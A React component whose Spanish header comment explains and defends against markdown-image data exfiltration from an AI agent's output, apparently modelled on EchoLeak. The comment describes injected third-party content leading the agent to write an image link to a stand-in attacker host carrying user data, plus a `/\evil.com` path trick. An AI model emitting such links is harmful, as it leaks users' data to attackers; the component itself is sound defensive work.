import React from 'react';
import PropTypes from 'prop-types';
import { useTranslation } from 'react-i18next';

/**
 * SafeMarkdownImage — el `img` de todo markdown que venga de un agente (#1802).
 *
 * El problema: react-markdown pinta `![](url)` como un `<img>` real, y el navegador
 * pide esa URL al renderizar, sin que nadie haga clic. Si un contenido de terceros
 * (un correo de M365, una página de Web Fetch, un resultado de búsqueda, un documento
 * subido) consigue por inyección que el agente escriba
 * `![](https://atacante/p.png?d=<datos>)`, los datos salen en cuanto se abre el hilo,
 * y otra vez cada vez que se reabre, porque la respuesta queda persistida. Es la forma
 * de EchoLeak (CVE-2025-32711).
 *
 * La regla: solo se carga una imagen del MISMO origen que la app. Cualquier otra
 * —otro dominio, `//host` sin esquema, `/\host`— se sustituye por un aviso de texto
 * con el dominio, NO clicable: un enlace devolvería el mismo canal a un clic de
 * distancia. Medido en prod el 2026-11-05: en todo el histórico de `message` había 2
 * imágenes markdown externas (miniaturas de SharePoint, un hilo de febrero), así que
 * bloquear no le quita nada a nadie.
 *
 * Es la capa principal; la red de seguridad es la CSP `img-src` del backend
 * (`server/config/cspImgSrc.js`), que frena también a un renderizador nuevo que se
 * olvide de usar este componente.
 *
 * ⚠️ Se decide con `new URL(src, location.origin).origin`, no con un regex sobre el
 * texto: el parser del navegador es el que resuelve `/\evil.com` como `//evil.com`, y
 * solo comparando con él se cierra esa familia de trucos.
 */

/**
 * @param {string|undefined|null} src - la URL tal como la entrega react-markdown
 * @param {string} [origin] - el origen de la app (por defecto, `window.location.origin`)
 * @returns {{ allowed: boolean, host: string|null }}
 */
export function classifyMarkdownImageSrc(src, origin = window.location.origin) {
  if (typeof src !== 'string' || src.trim() === '') return { allowed: false, host: null };
  let url;
  try {
    url = new URL(src, origin);
  } catch {
    return { allowed: false, host: null };
  }
  if (url.origin === origin) return { allowed: true, host: url.host };
  return { allowed: false, host: url.host || null };
}

function SafeMarkdownImage({ node, src, alt, ...props }) {
  const { t } = useTranslation();
  const { allowed, host } = classifyMarkdownImageSrc(src);

  if (allowed) {
    return <img src={src} alt={alt || ''} style={{ maxWidth: '100%' }} {...props} />;
  }

  const label = t('chat.externalImageBlocked', {
    host: host || '?',
    defaultValue: 'Imagen externa bloqueada ({{host}})',
  });
  return (
    <span
      data-testid="external-image-blocked"
      title={alt || undefined}
      style={{ fontStyle: 'italic', opacity: 0.75 }}
    >
      [{label}{alt ? `: ${alt}` : ''}]
    </span>
  );
}

SafeMarkdownImage.propTypes = {
  node: PropTypes.object,
  src: PropTypes.string,
  alt: PropTypes.string,
};

export default SafeMarkdownImage;
